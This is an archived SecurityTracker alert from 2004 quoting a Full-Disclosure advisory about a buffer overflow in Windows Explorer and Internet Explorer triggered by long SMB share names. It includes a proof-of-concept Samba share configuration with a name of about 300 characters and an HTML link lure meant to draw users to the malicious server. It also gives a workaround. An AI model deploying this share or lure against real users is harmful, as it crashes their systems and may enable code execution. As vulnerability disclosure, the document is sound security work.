SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Application (Web Browser)  >   Microsoft Internet Explorer (IE) Vendors:   Microsoft
Microsoft Internet Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1009939
SecurityTracker URL:  http://securitytracker.com/id/1009939
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Apr 26 2004
Original Entry Date:  Apr 26 2004
Impact:   Denial of service via network, Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  

Description:   A buffer overflow vulnerability was reported in Microsoft Windows Explorer and Internet Explorer. A remote user with control of a network share can cause a target user's browser to crash when connecting to the network share.

Rodrigo Gutierrez reported that a remote user with control of an SMB share can set a specially crafted share name so that when a target user attempts to connect to the SMB share, the target user's browser will crash or execute arbitrary code.

According to the report, Microsoft ostensibly fixed this flaw in Windows XP SP1 and Windows 2000 SP4 after being notified by Rodrigo Gutierrez in early 2002, as described in the Microsoft KB article 322857:

http://support.microsoft.com/default.aspx?scid=kb;en-us;322857

However, the report indicates that the problem was not properly fixed.

A demonstration exploit is provided in the Source Message.

Impact:   A remote user can cause a target user's browser to crash or execute arbitrary code when the target user attempts to connect to a malicious SMB share. The arbitrary code will execute with the privileges of the target user.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.microsoft.com/technet/security/ (Links to External Site)
Cause:   Boundary error
Underlying OS:   Windows (Me), Windows (NT), Windows (95), Windows (98), Windows (2000), Windows (XP)

Message History:   None.


 Source Message Contents

Date:  Sun, 25 Apr 2004 18:01:53 -0400
Subject:  [Full-Disclosure] Microsoft's Explorer and Internet Explorer long share name buffer overflow.


This is a multi-part message in MIME format.

------=_NextPart_000_0008_01C42AEF.63F557B0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

Fixed Advisory. 
 
Rodrigo Gutierrez.

------=_NextPart_000_0008_01C42AEF.63F557B0
Content-Type: text/plain;
	name="explorer-vuln.txt"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: attachment;
	filename="explorer-vuln.txt"

Microsoft Explorer and Internet Explorer Long Share Name Buffer =
Overflow.



Author: Rodrigo Gutierrez <rodrigo@intellicomp.cl>

Affected: MS Internet Explorer, MS Explorer (explorer.exe)=20
          Windows XP(All), Windows 2000(All), Windows 98(All), Windows =
me(All)

Not Tested: Windows 2003

Vendor Status: i notified the vendor in the beginning of 2002, this
               vulnerability was supposed to be fixed in xp service
               pack 1 in XP and SP4 in Windows 2000 according to the=20
               vendors knowledge base article 322857.

Vendor url: =
http://support.microsoft.com/default.aspx?scid=3Dkb;en-us;322857



Background.

MS Explorer (explorer.exe) and MS Internet Explorer(IEXPLORE.EXE) are=20
core pieces of Microsoft Windows Operating Systems.



Description

Windows fails to handle long share names when accessing a remote=20
file server such as samba, allowing a malicious server to crash the=20
clients explorer and eventually get to execute arbitrary code in the=20
machine as the current user (usually with Administrator rights in =
windows
machines).



Analysis

In order to exploit this, an attacker must be able to get a user to =
connect=20
to a malicious server which contains a share name equal or longer than =
300
characters.=20


Test Scenario

windows wont allow you to create such a long share, but of course samba=20
includes the feature ;).   After your samba box is up and running create =
a=20
share in you smb.conf :



#------------ CUT HERE -------------

[AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA]
comment =3D Area 51
path =3D /tmp/testfolder
public =3D yes
writable =3D yes
printable =3D no
browseable =3D yes
write list =3D @trymywingchung

#------------ CUT HERE -------------


After your server is up, just get to your windows test box and get to =
the
start menu > run > \\your.malicious.server.ip., plufff, explorer will =
crash
:).

Social Engineering:

<a href=3D"\\my.malicious.server.ip">Enter My 0day sploit archive   =
l/p:n0ph33r</a>
=20


Workaround.

>From your network card settings disable the client for Microsoft =
networks=20
until a real fix for this vulnerability is available.

------=_NextPart_000_0008_01C42AEF.63F557B0--

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC